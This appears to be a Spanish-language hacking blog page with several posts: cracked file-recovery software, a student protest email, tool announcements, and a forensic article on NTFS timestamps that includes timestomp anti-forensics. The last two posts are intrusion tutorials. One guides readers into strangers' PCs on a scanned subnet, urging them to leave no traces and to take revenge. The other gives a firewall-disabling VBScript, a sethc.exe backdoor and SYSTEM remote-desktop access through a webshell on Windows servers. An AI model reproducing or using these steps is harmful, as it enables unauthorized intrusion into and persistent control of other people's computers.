Banner 1

Recuperando archivos borrados en windows

2 comentarios
Bueno este post es mas técnico que otra cosa.

Veo la inquietud de adolfo en el chat sobre como recuperar carpetas en windows ; pues bueno hay muchos programas que permiten eso del momento no recuerdo ninguno porque a decir verdad solo me ha funcionado uno a mi medida y del cual dejare el links en la parte final.

Quiero aclarar varias cosas antes de irnos a la descarga:

1.son recuperables todos los archivos?, claro si no han sido sobreescritos.
2.Si los sobreescribir ya no hay solucion?, claro que la hay pero no se garantiza el 100% de recuperacion incluso en el caso de no haber realizado una sobreescritura.
3.cual es el mejor método?, el mejor método es el forense..eso implica maquinaria para ese tipo que igual es costosa.
4.como hago para saber si lo que borro no lo recuperan?, vale los métodos anti forenses se basan en la sobrescritura y en los peores de los casos dañar la cinta, medio magnético y hasta quemarlo xD.

Bueno sin mas bla bla bla xD dejo el link de descarga

Aviso....Tiene Medicina incorporada.

descarga


Saludos roboticos

UNIVERSIDADES PUBLICAS EN RIESGO

0 comentarios
Bueno el siguiente mensaje me llego al correo; DEBO aclarar algo... NO estudio ni he estudiado en universidades publicas pero se que es entrar en ellas y lo mucho que se debe estudiar para mantenerse en la institucion.
Publico esto no solo por apoyo incondicional a la educacion colombiana sino tambien con un sentido de critica hacia la administracion del gobierno hacia la educacion por el momento tengo un interrogante ¿como piensan en calidad educativa con el cierre de las universidades publicas? , porque tanta preparacion a los profesores con cursitos de ingles y cursitos de tics sino dan prioridad a la invesitigacion? y ademas darle la sostenibilidad econonima que la educacion eso sin contar que están "matando" al profesorado dejándolos sin tiempo para descanzar.

Si bien es sabido las TICs nos llaman a estar en constante estudio y bien? porque cerrar una institucion publica? osea solo estudien los que tengan modo...osea el mandato siempre sera de ellos.

Bueno no critico mas , eso es lo que cada persona deberia ver!!! y no dejarse manipular por rcn ni caracol que van con el gobierno y siempre ocultan TODO!!!! para que el pueblo no sienta las dolencias "embobar al pueblo".

NOTA: esta opinión que aquí expreso es de sentido critico , no culpo a nadie solo son pensamientos que me vienen a la cabeza; si alguien quiere opinar es bienvenido a opinar y sobre todo si estoy equivocado que me corrijan.

Bueno los dejo con el correo que me llego

----------------------------------------------------------------------------------------------------------------
UNIVERSIDADES PUBLICAS EN RIESGO,


Por favor ayúdanos a informar al Colombiano común , al que ve al país a través de RCN y Caracol, al bogotano que no tiene ni idea de las protestas de las otras ciudades porque no hay tiempo para ellas en los noticieros, aunque si lo haya para informar 45 min de fútbol , 30 min de farándula y 15 min de novelas. Al colombiano que cree que en la U no hay clase, porque 'unos pocos no dejan estudiar' pues nadie le dijo por qué protestaban estos estudiantes.

¿Cómo ha sido la protesta?




-Ha habido marchas al estilo carnaval , 15.000 alumnos bailaban o iban disfrazados.


-Hemos rodeado la universidad nacional con velas.


-Los compañeros de artes han hecho pinturas muy bonitas por todo el campus en señal de protesta.


¿Quieres ver las fotos?


http://picasaweb.google.com/informartes/PropuestasCreativas


¿Y por qué no sabías de la protesta?


Simple,eso no vende en rcn ni caracol , como si lo hace el reinado y los avances de las telenovelas que dan unos minutos después.


No te enteraste de la marcha más que en el reporte de tráfico de city tv, ese día no cogiste transmilenio porque 'los revoltosos de la nacho, ladistri y la piedragógica si que joden....' no te molestaste en preguntar el porqué.


¿Por qué es la protesta en las Universidades Públicas?

Por el plan nacional de desarrollo, particularmente por el artículo 38.

En este se estipula que las universidades tienen que asumir parcialmente su pasivo pensional.


¿y qué pasa?


Lo que sucede es que el pasivo pensional es demasiado dinero, billones de pesos.


¿Podría pagarlo?


La respuesta es no. Se repetiría el el caso de la Universidad del Atlántico, una universidad pública que está al borde de la quiebra hace años por la aplicación de un régimen similar ( ¿no lo sabías? y no es la única universidad pública que se está muriendo.... No lo sabías porque nunca sale en las noticias, debe ser que no quieren que lo sepas. )


Para pagarlo, la universidad tendría que aumentar las matrículas hasta en un 300%, dejar de investigar, contratar profesores más baratos y arrendar sus propios predios. y aun así no podría pagar la deuda que le generaría el asumir su pasivo pensional. Muchos no podrían pagar la matrícula, bajaría el nivel académico y la universidad se vendería hasta quebrarse.


Otros motivos de protesta....


Hace poco el congreso aprobó otros artículos de este plan, uno dice que los egresados de universidades públicas tendrán que pagar, después dehaberse graduado , 15 años más por haberse educado ahí.


Otro artículo problemático, dice que las carreras en las universidades públicas tienen que responder a las necesidades del mercado. Es decir,lo que no tenga utilidad inmediata se suprime. (como lo q quieren hacer con Bellas Artes en Cali)


De nada le sirve al país la investigación, según este concepto, ni las ciencias humanas, ni mucho menos las artes.


¿Para qué filósofos? ¿Para qué matemáticos?, ¿para qué músicos? , según ellos, para nada.


Sólo sirve lo que haga falta, el país no puede innovar, tiene que satisfacer sus necesidades inmediatas, se educa gente para que pueda comer y ya,quieren que Colombia no deje de ser un país subdesarrollado. Aquí no existirá ni el conocimiento ni la investigación , eso le corresponde a los países desarrollados que invierten en esto y que cada vez se vuelven más ricos por estar a la vanguardia en el conocimiento.


En resumidas cuentas... las universidades públicas protestan porque:


- el plan nacional de desarrollo pretende imponer les una deuda que no les corresponde y que no pueden pagar. Una deuda que las llevará a la quiebra.

- los que puedan graduarse de lo que queda de universidad tendrán que seguir pagando por un periodo largo de su vida.


-las nuevas generaciones no podrán escoger entre un amplio número de programas sino entre los que el gobierno crea que el país necesita a cortísimo plazo.
http://www.rcn.com.co/noticia.php3?nt=19197


http://www.portafolio.com.co/port_secc_online/porta_econ_online/2007-05-22/ARTICULO-WEB-NOTA_INTERIOR_PORTA-3516534.html





todos merecemos educación superior, los estudiantes de las universidades públicas queremos estudiar, de hecho a todos nos costó mucho trabajo ingresar a ellas,

COLOMBIA MERECE TENER EDUCACIÓN SUPERIOR PÚBLICA DE CALIDAD.


Te agradeceremos enormemente , si hay un espacio en tu corazón para los miles de estudiantes del país que se educan en las universidades públicas.

----------------------------------------------------------------------------------------------------------------

Reflexionen sobre el futuro o es que no lo hay?

saludos roboticos

como buscar exploits

0 comentarios
En algun tiempo intente buscar un exploit en google y la verdad nunca lo encontre tal parese que google bloquea una parte de las paginas con este contenido; pero hoy les traigo la solucion.
Se trata de un buscador de exploits , es una interezante propuesta para las personas que nos gusta el pentest o el hacking ya que nos facilita mucho el trabajo.

Bueno sin mas detalles aqui les dejo el link:

http://exploitsearch.com/


Bueno espero les sirva.

saludos roboticos

Cain & Abel estrena nueva version

0 comentarios
Es un placer anunciarles que Cain & Abel estrenan nueva version, hace mucho tiempo que esperaba cambios y aumento de sus caracteristicas porque para mi es una de las mejores herramientas que existen(obviamente libre).
Para las personas que no conoscan esta herramienta les comentare a grandes rasgos para que sirve:

1.Cracking
2.Snifing

De estas dos tecnicas salen muchas utilidades asi que las caracteristicas de esta herramienta son muchas y muy utiles.

Hasta ahora tengo entendido estos cambios:
  • Añadido Abel64.exe y Abel64.dll para apoyar los hashes de la extracción en los sistemas operativos de 64bits.
  • Añadido soporte de NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Wireless Password Decoder, credenciales para los sistemas operativos de 64bits.
  • Password Manager Decoder, Dialup Password Decoder.
  • Añadido Windows Live Mail (Windows 7) Password Decoder para POP3, IMAP, NNTP, SMTP y las cuentas LDAP.
  • Corregido un error de la Calculadora RSA SecurID dentro de la función de importación XML.
Bueno prontamente estare haciendo laboratorios con el para provar la diferencia entre versiones al igual que el nmap, asi que esten atentos.

Link de desacarga, pagina oficial y manual

http://www.oxid.it/cain.html

Que lo disfruten y

saludos roboticos

convertidor de String a ASCIIC

2 comentarios
Me place presentarles una herramienta muy util desarrollada por un moderador de la comunidad LH que la disfruten.

--------------------------------------------------------------------------------------------------

ASCIIC - by xassiz

Bueno, os dejo esta aplicacion que acabo de programar en VBScript xDD

Pasa una cadena a ASCII y además tiene la opción de copiar el resultado al portapapeles.. =)

Esta perfecto para convertir las tablas en una inyección SQL.



Descarga Aqui

Pass: xassiz09

FUENTE:http://foro.latinohack.com/showthread.php?t=21879&page=2

Agradecimientos a
xassiz por su colaboracion

lineas de tiempo(timeline)forense

0 comentarios
Este es un post de neofito , como siempre con sus grandes aportes en forense.

--------------------------------------------------------------------------------------------------

Una timeline sería un diagrama cronológico donde cada uno de los registros se correspondería con un evento determinado. Para el caso del análisis forense de sistemas existen una serie de valores asociados a todos los ficheros/directorios y que resultan de especial interés. Se trata de las marcas de tiempo, MAC times, o lo que es lo mismo:
  • Fecha de creación
  • Fecha de modificación
  • Fecha de último acceso
Estos valores podemos consultarlos desde la línea de comandos de Windows, método preferente dado que así no los alteraremos de forma involuntaria:
dir /tc fichero | findstr /r "[0-9]*/[0-9]*/[0-9]*"
dir /tw fichero | findstr /r "[0-9]*/[0-9]*/[0-9]*"
dir /ta fichero | findstr /r "[0-9]*/[0-9]*/[0-9]*"

Los comandos anteriores se utilizan para obtener, respectivamente, la fecha de creación, modificación y último acceso para un fichero determinado. La coletilla se encargará de filtrar la salida para mostrarnos únicamente esta información.

Las diferentes operaciones realizadas sobre ficheros en particiones NTFS provocan la actualización de las diferentes marcas de tiempo. Podemos consultar un resumen de estos procesos en el artículo 299648 de la base de datos de conocimientos de Microsoft.

Muy a tener en cuenta es la forma en que Windows trata el proceso de modificación del parámetro fecha de último acceso. Bajo sistemas de ficheros NTFS este valor no resulta actualizado a veces hasta incluso una hora después de producirse el acceso, todo para conseguir un mayor rendimiento. Según menciona Brian Carrier en su recomendadísimo "Filesystem Forensic Analysis" el valor se almacenaría en memoria hasta su posterior volcado a disco.

El siguiente artículo de la MSDN indica como crear un valor del registro que deshabilitará por completo el proceso de actualización de este valor. De hecho, bajo Windows Vista, esta funcionalidad viene aplicada por defecto.

Si a esto le sumamos que podemos alterar cualquiera de los valores MAC de forma voluntaria ya tenemos una forma burda de dificultar una investigación.

Modificando las marcas de tiempo

Podemos utilizar la API de Win32, concretamente las funciones CreateFile para abrir un fichero y SetFileTime para modificar cualquiera de las marcas de tiempo asociadas al mismo. Sirva como ejemplo el siguiente "programa" generado por un servidor utilizando estos dos artículos de la MSDN:

Changing a File Time to the Current Time
Opening a File for Reading or Writing

El "código" anterior establecerá la fecha de creación de un fichero, indicado como argumento desde la línea de comandos, a la fecha y hora en que se ejecute. Su modificación para otros menesteres resulta realmente trivial. Huelga decir que no me responsabilizo en forma alguna por los efectos negativos que puedan derivarse de su uso (u mal uso).

Y recurriendo a utilidades de terceros dado que en Windows no existe un comando touch integrado como el de los sistemas *NIX, podemos utilizar, por mencionar alguno, el binario ChangeTime. A continuación un ejemplo de uso para modificar la fecha de creación de un fichero, prueba.txt, dejando el resto de parámetros como estaban y consultando sus valores antes y después del proceso:
C:\>ChangeFileTime.exe prueba.txt

*********************************************************************

Filename : prueba.txt
Creation Time : 20-08-2009 23:55:47
Last Access Time : 20-08-2009 23:55:47
Last Modified Time : 20-08-2009 23:55:47

*********************************************************************

C:\>ChangeFileTime.exe -c prueba.txt

*********************************************************************

Filename : prueba.txt
Creation Time : 20-08-2009 23:55:47
Last Access Time : 20-08-2009 23:55:47
Last Modified Time : 20-08-2009 23:55:47

*********************************************************************


Note : You can press if you want to retain previous date/time

Creation Time : 20-08-2009 23:55:47
New Date( dd-mm-yyyy) : 20-08-2009

New Time( hh-mm-ss) : 23:00:00

Last Access Time : 20-08-2009 23:55:47
New Date( dd-mm-yyyy) :

New Time( hh-mm-ss) :

Last Modified Time : 20-08-2009 23:55:47
New Date( dd-mm-yyyy) :

New Time( hh-mm-ss) :

C:\>ChangeFileTime.exe prueba.txt

*********************************************************************

Filename : prueba.txt
Creation Time : 20-08-2009 23:00:00
Last Access Time : 20-08-2009 23:55:47
Last Modified Time : 20-08-2009 23:55:47

*********************************************************************

Bueno, aún no está todo perdido, existen otros valores de tiempo que el SSOO no nos muestra pero que, como las meigas, haberlos hailos. Empezaremos hablando de la "fecha de modificación para la entrada de la MFT", pero para eso, bajaremos varias capas de abstracción analizando la estructrura del disco en crudo.

Introducción al sistema de ficheros NTFS

Primero decir que esto es sólo una introducción, por lo que se quedarán muuuchas cosas en el tintero. Para ahondar más en el tema recomiendo nuevamente el libro de Brian Carrier, "Filesystem Forensic Analysis", y el todavía inacabado (esperemos que por poco tiempo) taller de análisis forense de NTFS publicado en Wadalbertia por el compañero Vic_Thor.

NTFS es, sin duda, uno de los sistemas de ficheros más extendidos en la actualidad y apareció en escena con la presentación de Windows NT. Se diseñó con la intención de que fuera fácilmente escalable y su principal característica es que toda la información relacionada con la estructura del sistema de ficheros se almacena precisamente en ficheros, los cuales no son directamente visibles desde el sistema operativo.

El corazón del sistema de ficheros lo compone la MFT, una tabla de registros por cada uno de los ficheros/directorios almacenados en disco. Cada una de las entradas tiene habitualmente un tamaño de 1024 bytes y la primera de ellas apunta a la ubicación del fichero $MFT, o sea, apunta a sí misma. Dado que la ubicación del $MFT no siempre necesariamente coincide, como también sucede con el resto de ficheros de metadatos, para localizarla se utiliza la dirección de inicio almacenada en el sector de arranque ($Boot), el cual siempre se ubica en el primer sector del sistema de ficheros.

Es más dificil leerlo que verlo, así que nos pondremos a ello. Siempre que sea posible trataré de utilizar herramientas 'free' y por ello descargaremos FTK Imager de AccessData, el hermano pequeño de Forensic Toolkit, también de la misma casa.

Para las pruebas voy a utilizar un pendrive de 2GB, el cual está formateado como NTFS y contiene un único fichero, prueba.txt, con el contenido "Hola Mundo". Desde FTK Imager puede analizarse directamente la estructura de un disco físico, pero en su lugar utilizaré las capacidades de la herramienta para crear imágenes de disco en diferentes formatos.

Una vez lanzada, menú 'Archivo', 'Crear imagen de disco...' y seleccionamos 'Unidad física' como tipo para la evidencia de origen. En la siguiente pantalla indicaremos el disco de origen:

FTK Imager: Selección de unidad

Ahora, tras pulsar el botón 'Agregar', indicaremos el tipo para la imagen de disco resultante (dd en nuestro caso) así como la información relativa al elemento de evidencia (Núm. caso, Núm. evidencia, etc). Por último indicaremos la ubicación del fichero resultante, nombre del fichero de imagen sin extensión y un 'Tamaño de fragmento de imagen' igual a 0 (no fragmentar).

Si hemos aceptado el resto de parámetros por defecto cuando finalice el proceso de creación de la imagen se realizará una verificación de integridad, mostrando un resumen del resultado del proceso que incluye las sumas de comprobación manejadas (SHA1 y MD5). Toda esta información y alguna más se almacenará en disco, junto al fichero de imagen, en un txt.

Ahora que ya tenemos la imagen vamos a analizar su contenido. De nuevo en FTK Imager accedemos al menú 'Archivo', 'Agregar elemento de evidencia...' y seleccionamos 'Archivo de imagen' como tipo para la evidencia de origen, localizando a continuación el fichero obtenido en el paso anterior.

FTK Imager: Lista de archivos

En el panel superior derecho, 'Lista de archivos', veremos los ficheros de metadatos, precedidos por el caracter $, asi como el fichero de texto que utilizaremos para las pruebas. Si seleccionamos el fichero $MFT en el panel inferior derecho podremos ver su contenido en hexadecimal. Nótese como la primera entrada, al igual que el resto, comienza con un valor de firma igual a FILE. Otro posible valor de firma es BAAD e indicará que la entrada de la MFT no es válida.

Si nos desplazamos 1024 bytes hacia delante (0400 en hexadecimal), encontraremos el valor de firma que marca el inicio de una nueva entrada, y una delgada línea discontínua incluida por FTK para facilitar su análisis.

FTK Imager: Vista hexadecimal

Ahora ya sabemos identificar los diferentes registros almacenados en la MFT, pero para localizar la entrada correspondiente a nuestro fichero prueba.txt de forma sencilla vamos a utilizar un "truco". Utilizaremos para ello la herramienta Mount Image Pro, la cual podremos descargar en versión trial, válida durante 14 días, desde el sitio oficial.

Una vez instalada y a través de su interfaz pulsaremos el icono 'Mount' seleccionando a continuación el fichero dd que estamos analizando. Aceptaremos los parámetros ofrecidos por defecto y, como resultado, tendremos una nueva unidad de disco que nos permitirá acceder al contenido de la imagen:

Mount Image Pro

Ahora descargaremos las OEM support tools desde la página de Microsoft y extraeremos el binario nfi.exe, el cual nos mostrará información sobre un volumen formateado como NTFS. Bastará con ejecutar:
C:\>nfi.exe F:

En este caso le estoy indicando como parámetro la unidad 'F:', asignada automáticamente por Mount Image Pro para el montaje de la imagen dd. Si analizamos los resultados obtenidos identificaremos las diferentes entradas almacenadas en la MFT, numeradas empezando por 0 y correspondiéndose la última de ellas con el fichero objeto de análisis, prueba.txt:
File 35
\prueba.txt
$STANDARD_INFORMATION (resident)
$FILE_NAME (resident)
$DATA (resident)

El primer dato que encontramos es el número de entrada de la MFT, seguido del nombre de fichero al que referencia. A continuación están los atributos que conforman la entrada, así como si están íntegramente contenidos en ella (resident) o no (nonresident).

Cada entrada de la MFT está compuesta por una cabecera de un tamaño fijo (48 bytes para Windows 2000 e inferiores o 56 bytes para Windows XP y superiores) y una serie de atributos, almacenados de forma secuencial. A su vez cada atributo está formado por una cabecera de 16 bytes y una serie de datos con estructura variable.

Vamos a verlo "en directo". Desmontaremos la imagen desde Mount Image Pro y volveremos a FTK Imager. Seleccionaremos el fichero $MFT y centraremos nuestra atención en el panel inferior derecho. Si nos encontramos al comienzo del fichero (MFT entry 0) y queremos analizar la entrada número 35, sabiendo que cada entrada de la MFT tiene un tamaño de 1024 bytes:
35 * 1024 = 35840

Y eso que yo y las matemáticas no somos muy buenos amigos.

Para desplazarnos a la dirección deseada botón derecho sobre el panel hexadecimal, 'Ir a desplazamiento...' e indicamos 35840 como el número de bytes en decimal, pulsando el botón 'Finalizar' a continuación.

Vale, ya estamos en la entrada de la MFT asociada a nuestro fichero y hemos descartado los 56 bytes de la cabecera hasta encontrarnos con el primer atributo almacenado. Los primeros 4 bytes de los 16 que componen la cabecera del atributo se corresponden con el identificador de tipo:
10 00 00 00 = 00 00 00 10 = 16

Si tenemos en cuenta que los datos se almacenan en formato litle endian obtendríamos que, en este caso, el valor final se corresponde con el de la $STANDARD_INFORMATION.

Este atributo es siempre residente, existe uno por cada fichero/directorio almacenado y contiene los metadatos asociados al elemento en cuestión. De la cabecera del atributo, cuya estructura es común para todos, también nos interesa el tamaño del mismo, que se almacena en los bytes 5 al 8 y que nos dará el desplazamiento en bytes hasta el comienzo del siguiente atributo:
60 00 00 00 = 00 00 00 60 = 96 bytes

Esto quiere decir que si contamos 96 bytes desde el inicio de la cabecera del atributo nos econtraremos con el comienzo del siguiente atributo:

FTK Imager: Vista hexadecimal

Volvamos a la $STANDARD_INFORMATION y analicemos las 4 marcas de tiempo ubicadas consecutivamente a partir del byte 25. Cada una de estas marcas de tiempo tiene un tamaño de 8 bytes (64 bits) y en NTFS se almacenan en formato UTC. Para nuestro ejemplo serían:
  • Fecha de creación
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de modificación
    53 23 b8 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de modificación de la entrada MFT
    53 23 b8 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de último acceso
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200
Juntos forman los MACE times del fichero prueba.txt (M=Modified, A=Accessed, C=Created y E=Entry modified). Para la interpretación de los valores de tiempo podemos utilizar DCode o el panel inferior izquierdo de la interfaz de FTK, en concreto la pestaña 'Intérprete de valores hexadecimales':

FTK Imager: Intérprete de valores hexadecimales

El valor de modificación de la entrada MFT se actualizará siempre que se modifique cualquiera de los atributos que ésta contiene. Ya hemos encontrado una cuarta marca de tiempo, pero ahora llegan las malas noticias, este valor también puede ser modificado para seguir dificultando una investigación.

Metasploit Anti-Forensics Project

Allá por el 2005, y de la mano de la gente del proyecto antiforense de Metasploit apareció la herramienta timestomp cuya ultima versión disponible de forma independiente tiene ya unos 5 añitos. Desde la publicacion del Metasploit Framework v3.0 el binario timestomp aparece integrado como una extensión del payload meterpreter.

Surgida como una aplicación anti-forense permite modificar los valores para las 4 marcas de tiempo almacenadas en el atributo $STANDARD_INFORMATION de un fichero. Posee también un flag que permite eliminar por completo estas marcas de tiempo para confundir la interpretación de los datos realizada por Encase, pero desde Windows Vista y utilizando la ultima versión independiente disponible no he conseguido aplicar esta funcionalidad.

Vamos a probarla y para ello utilizaremos nuevamente el pendrive original con cuya imagen de disco estábamos trabajando. Obtendremos primero los valores MACE asignados actualmente al fichero:
C:\>timestomp.exe F:\prueba.txt -v
Modified: Saturday 8/22/2009 23:9:26
Accessed: Saturday 8/22/2009 23:9:26
Created: Saturday 8/22/2009 23:9:26
Entry Modified: Saturday 8/22/2009 23:9:26

Y ahora modificaremos todos los atributos MACE, comprobando nuevamente sus valores al terminar:
C:\>timestomp F:\prueba.txt -z "Saturday 8/22/2009 01:00:00 PM"

C:\>timestomp.exe F:\prueba.txt -v
Modified: Saturday 8/22/2009 13:0:0
Accessed: Saturday 8/22/2009 13:0:0
Created: Saturday 8/22/2009 13:0:0
Entry Modified: Saturday 8/22/2009 13:0:0

Afortunadamente todavía existe un conjunto de valores MACE asociados a un fichero y que nos servirán para cotejar los resultados obtenidos, permitiendo detectar el uso de herramientas similares a timestomp.

El atributo $FILENAME

Antes de continuar repetiremos el proceso de generación de un fichero de imagen de la unidad física analizada, en este caso mi pendrive. No voy a indicar nuevamente los pasos a dar, basta con volver algunos párrafos atras para encontrarlos.

Una vez abierta nuevamente la imagen mediante FTK nos desplazaremos a la entrada número 35 de la MFT (offset 35840), descartaremos la cabecera y, teniendo en cuenta que el desplazamiento desde el primer atributo, $STANDARD_INFORMATION, hasta el siguiente son 96 bytes avanzaremos hasta el comienzo del mismo.

FTK Imager: Vista hexadecimal

Consultaremos antes los valores MACE de la $STANDARD_INFORMATION una vez modificados mediante timestomp:
  • Fecha de creación
    00 78 57 b1 17 23 ca 01 = sáb, 22 agosto 2009 13:00:00 UTC+0200

  • Fecha de modificación
    00 78 57 b1 17 23 ca 01 = sáb, 22 agosto 2009 13:00:00 UTC+0200

  • Fecha de modificación de la entrada MFT
    00 78 57 b1 17 23 ca 01 = sáb, 22 agosto 2009 13:00:00 UTC+0200

  • Fecha de último acceso
    00 78 57 b1 17 23 ca 01 = sáb, 22 agosto 2009 13:00:00 UTC+0200
Seguimos donde estábamos, los primeros 4 bytes de los 16 que componen la cabecera del atributo se corresponden con el identificador de tipo para $FILENAME:
30 00 00 00 = 00 00 00 30 = 48

Este atributo, al igual que el anterior, es siempre residente y existe uno por cada fichero/directorio almacenado. Dentro de una entrada MFT este atributo se utiliza para contener el nombre del elemento así como una referencia a su directorio padre.

Si contamos 32 bytes desde el comienzo del atributo encontraremos los 4 valores de 8 bytes conteniendo otro conjunto de marcas de tiempo:
  • Fecha de creación
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de modificación
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de modificación de la entrada MFT
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200

  • Fecha de último acceso
    ab c1 b7 d4 6c 23 ca 01 = sáb, 22 agosto 2009 23:09:26 UTC+0200
Si tenemos en cuenta que estos valores únicamente se modifican cuando se crea o mueve un fichero, por lógica deberían ser anteriores a los valores del atributo $STANDARD_INFORMATION; por lo tanto, en nuestro caso, encontramos una evidencia de que las marcas de tiempo pueden haber sido alteradas deliberadamente.

La interpretación de los valores de tiempo dependerá de las características del caso; como decía Einstein "el tiempo es relativo".

Enlaces relacionados

Timeline Analysis Bibliography

The Linux-NTFS Wiki

Wikipedia: NTFS (en, es)

Taller Forensic II. NTFS (Iniciado.....)

Analysis of hidden data in the NTFS file system

Windows Vista Forensic Artifacts

Time and Timestamps

Beating the Daylight Savings Time bug and getting correct file modification times

Anti-Forensics

Metasploit Anti-Forensics Project

Forensic Wiki: Timestomp

Detecting timestamp changing utilities

NTFS Time Stamps --file created in 1601, modified in 1801 and accessed in 2008!!

Conclusión, al menos sabemos más que ayer, pero esperemos que un poco menos que mañana.


FUENTE:http://neosysforensics.blogspot.com/2009/08/ensayo-acerca-del-tiempo.html

Entrando a una PC desconocida con Essential NetTools, by Phanter-RooT

3 comentarios
Bueno y me despido hoy con esta ultima entrada referente a essential net tools , pido perdon por la imagenes si se ven cortadas pero el blog no permite imagenes tan grandes , en ese caso les pido visitar la fuente original.

--------------------------------------------------------------------------------------------------

Buenas, voy a hacer un manual de como entrar a una pc con el Essential NetTools



Herramientas: Essential NetTools

Bueno, nos bajamos el programa con el link que deje ahi.
Una ves instalado lo abrimos y veremos lo siguiente:



http://img172.imageshack.us/img172/8910/55259768sy9.jpg

Bueno, como veran a la izquierda tiene muchas opciones...

entre ellas podemos ver un Pinger, traceroute, portscaner, nslookup.. etc. Pero lo que nos interesa es el NetAudit, por lo tanto lo clickeamos.

Vamos a encontrarnos con esto:



http://img171.imageshack.us/img171/9130/15761115hm5.jpg

Una ves ahi vemos 2 textboxs:

Uno dice: Direccion IP Inicial: y el otro dice: Direccion IP Final.

Como todos sabemos, las IP pueden empezar en 1 y terminar en 255, por ejemplo:

Inicial: 190.1.1.1
Final: 190.255.255.255

Seria una bestialidad poner eso ya que son demaciadas computadoras... XD

Por lo tanto, nos fijamos cual es NUESTRA IP



http://img509.imageshack.us/img509/6932/11869488wf2.jpg

Una ves teninedo nuestro IP, usamos todos los numeros, excepto los finales, en mi caso quedaria asi:

190.50.204.

Entonces, en IP Inicial ponemos: 190.50.204.1
Y en IP final seria: 190.50.204.255

Una ves que pusimos eso, le damos al boton Iniciar, y vemos lo que pasa:



http://img295.imageshack.us/img295/1525/97214771ng5.jpg

Como ven, empieza a cargar todas las IP.

Una ves que pone las ip, algunas van a ponerse en color AZUL, diciendo VERIFICAR.
Ahora esperamos a que alguna se ponga en ROJO y diga COMPLETADO:



http://img297.imageshack.us/img297/3999/35063462cr0.jpg

Ahora le damos click derecho a esa IP, y le ponemos: Abrir como: ADMIN:



http://img182.imageshack.us/img182/382/11716656tu6.jpg

Y ahora.. Tatannnnnnnn! Miren lo que paso:



http://img175.imageshack.us/img175/4241/20957119qf7.jpg



Vieron, es facilisimo! Cada ves hay menos seguridad en las PC...
Tambien podemos ver todos los datos.. tocando el boton +



http://img176.imageshack.us/img176/6141/25826462zr5.jpg





Espero que les haya gustado mi manual..!

solo uso educativo. No hagan nada en la pc, no creen ni borren nada!! no dejen rastros!!!

Al menos que conoscan a la persona, y sepan q no los va a denunciar, y sea una venganza o algo..

Ever Be Anonymous Tongue

By Phanter-RooT !

FUENTE:http://argeniverso.66ghz.com/index.php

2/2 - Rootear Servidores Windows

0 comentarios
la segunda parte de esta gran trabajo.

------------------------------------------------------------------------------------------------------

Rooteando Servidores Windows

Buenas Grin
Esta es la segunda parte del tutorial 1/2 Rootear Servidores Linux o Unix, en esta segunda parte como bien dice el título se tratará sobre los servidores Windows.
Como ya ha sido explicado en el primer tuto no voy a volver a explicar lo que es el Rooteo ni nada referente a las WebShell, permisos, ni directivas PHP.
Cabe destacar que teniendo una WebShell en un servidor Windows es como tener total control de la Shell de Windows, ya que podemos ejecutar cualquier tipo de orden mediante la WebShell.


1 - 50% de posibilidades.
2 - Bypasseando el Firewall.
3 - Backdoorizando (Terminal Server).
4 - Accediendo como SYSYEM (root de Windows).
5 - Terminal Server sin usuario SYSTEM (Alternativa).
6 - Troyanizando (Alternativa).



1 - 50% de posibilidades


¿50%?
Si, el cincuenta por ciento de posibilidades que tenemos para que todo salga, o todo no salga (suponiendo que ya hayamos bypasseado lo que debamos haber bypasseado).
¿Por qué esto es así?
Esto es así debido que la persona que haya montado el servidor o servidores haya decidido correrlos con una cuenta Limitada o una de Administrador.
Para poder realizar el rooteo, nos debe haber tocado una cuenta de Administrador (lo más normal es que sí).
La siguiente imagen lo explica:


Como podemos ver, necesitamos por lo menos Instalar programas y hardware ,realizar cambios en todo el sistema y crear cuentas de usuario (esta es opcional).

2 - Bypasseando el Firewall


Bueno, esto no es muy dificil, ya que simplemente deberemos ejecutar un script Visual Basic Script (VBScript).
Abrimos un editor de texto, y pegamos el siguiente code VBS:
Código: [Seleccionar]
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false

Este code lo guardamos como, firewall.vbs.
Ahora solo debemos subirlo mediante la WebShell al directorio que sea, y en ese mismo directorio ejecutar esto en la entrada de comandos de la WebShell:
Código: [Seleccionar]
rutadelarchivo\firewall.vbs

Es decir, imaginemos que hemos viajado hasta el disco C: :
Código: [Seleccionar]
C:\firewall.vbs

Chao Firewall :dedo: !

3 - Backdoorizando (Terminal Server)


Bien, esto consiste en habilitarle el servidor de Terminal Server, Escritorio Remoto de Windows en otras palabras, y de paso cambiarle sethc.exe por cmd.exe.
Para ello podeis echar un vistazo al tutorial que hizo hace tiempo 3D1, Manual - Hackear por Escritorio Remoto de Windows (Por Puerto 3389).
Lo seguis hasta el paso 2.1), y copiais el segundo code, lo guardais como backdoor.bat y ya Grin

Cuando esté el .bat listo, simplemente habrá que subirlo mediante la WebShell al directorio que se quiera y hacer lo mismo que con el VBScript:
Código: [Seleccionar]
rutadelarchivo\backdoor.bat

En caso de estar en C: :
Código: [Seleccionar]
C:\backdoor.bat

Ahora rezemos porque se haya abierto el puerto en el Router Undecided
:cura: Padre nuestro que estás en bla bla bla... :cura:

4 - Accediendo como SYSYEM (root de Windows)


Si se ha backdoorizado correctamente y nuestro señor nos ha abierto el puerto en el Router (XD), bastaría con hacerle una visitita con nuestro cliente de escritorio remoto o rdesktop de Linux.
En el caso que estemos en Windows:
Inicio, ejecutar, mstsc.exe o Iinicio\Todos los Programas\Accesorios\Comunicaciones\Conexion a Escritorio Remoto.
En ese menú, le damos al botón [Opciones >>]
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto".
En el caso de Linux no hay que configurar eso, ya que siempre se ejecuta en el equipo remoto.

Llegó la hora de la verdad... Tongue
